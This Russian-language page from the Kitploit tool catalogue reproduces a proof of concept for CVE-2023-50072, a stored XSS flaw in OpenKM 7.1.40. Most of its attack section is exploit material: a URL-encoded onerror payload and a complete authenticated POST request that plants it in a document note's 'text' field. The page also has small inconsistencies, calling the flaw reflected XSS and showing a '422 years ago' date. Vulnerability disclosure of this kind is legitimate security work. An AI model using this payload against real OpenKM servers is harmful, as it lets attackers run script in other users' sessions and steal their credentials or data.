Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/ahrixia/cve-2023-50072
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubahrixia/cve-2023-50072

CVE-2023-50072

Уязвимость хранимого межсайтового скриптинга (XSS) существует в OpenKM версии 7.1.40.

Репозиторий
422 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-50072

В OpenKM версии 7.1.40 (dbb6e88) с профессиональным расширением существует уязвимость хранимого межсайтового скриптинга (XSS), которая позволяет аутентифицированному пользователю загрузить заметку к файлу, действующую как хранимая XSS-нагрузка. Любой пользователь, открывший заметку файла документа, запустит XSS.

Уязвимый параметр: text

Эксплойт - Доказательство концепции (POC)

Отраженный межсайтовый скриптинг (XSS)

root@kitploit:~
Payload :  
FINAL Payload (URL encoded) : <image/src/onerror%3dalert(1)>

GET-запрос на [http://localhost/openkm/rest/note/nodes/NODE-ID] :

root@kitploit:~
POST /openkm/rest/note/nodes/34bc430a-e3db-4efa-8289-3d0894010f67 HTTP/2
Host: EXAMPLE.COM
Cookie: lang=en-GB; JSESSIONID=EC6EF7B1DB85C3A839C9D3054095AA8E
Content-Length: 23
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"
X-Requested-App: kcenter
Sec-Ch-Ua-Mobile: ?0
Authorization: OKM ey[REDACTED]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/plain, */*
Sec-Ch-Ua-Platform: "Windows"
Origin: https://EXAMPLE.COM
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://EXAMPLE.COM/openkm
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

text=<image/src/onerror%3dalert(1)>

Воздействие

Хранимый XSS позволяет злоумышленникам внедрять вредоносные скрипты в веб-приложение, которые сохраняются и выполняются, когда другие пользователи просматривают затронутую страницу. Это может привести к краже конфиденциальной информации, перехвату сеансов или распространению вредоносного ПО.

Скриншот

openkm

Другие работающие полезные нагрузки

root@kitploit:~
Payload : 
FINAL Payload (URL encoded) : 
Скачать инструмент